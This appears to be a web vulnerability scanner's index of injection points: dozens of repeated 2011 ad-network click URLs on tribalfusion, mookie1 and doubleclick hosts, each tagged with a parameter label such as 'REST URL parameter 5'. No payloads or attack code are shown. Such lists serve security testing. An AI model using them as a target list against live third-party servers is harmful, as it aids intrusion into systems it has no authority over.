http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 13]
http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 14]
http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 15]
http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 16]
http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 17]
http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 18]
http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 19]
http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 3]
http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 4]
http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 5]
http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 6]
http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 7]
http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 8]
http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 9]
http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [http://ad.doubleclick.net/jump/N3740.270604.B3/B5112048;abr parameter]
http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [name of an arbitrarily supplied request parameter]
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/ [7987e parameter]
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/ [name of an arbitrarily supplied request parameter]
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/ [ord parameter]
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 [REST URL parameter 3]
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 [REST URL parameter 4]
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 [REST URL parameter 5]
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 [REST URL parameter 6]
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 [REST URL parameter 7]
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 [name of an arbitrarily supplied request parameter]
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 [sz parameter]
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [REST URL parameter 3]
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [REST URL parameter 4]
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [REST URL parameter 5]
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [REST URL parameter 6]
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [REST URL parameter 7]
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [adID parameter]
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [cs:a:e parameter]
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [cs:e parameter]
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [cs:pro parameter]
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [migAgencyId parameter]
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [migRandom parameter]
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [migSource parameter]
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [migTrackDataExt parameter]
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [migTrackFmtExt parameter]
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [migUnencodedDest parameter]
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [name of an arbitrarily supplied request parameter]
http://a.tribalfusion.com/h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/ [name of an arbitrarily supplied request parameter]
http://a.tribalfusion.com/h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/ [ord parameter]
http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [;ord parameter]
http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 10]
http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 11]
http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 12]
http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 13]
http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 14]
http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 15]
http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 16]
http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 17]
http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 18]
http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 19]
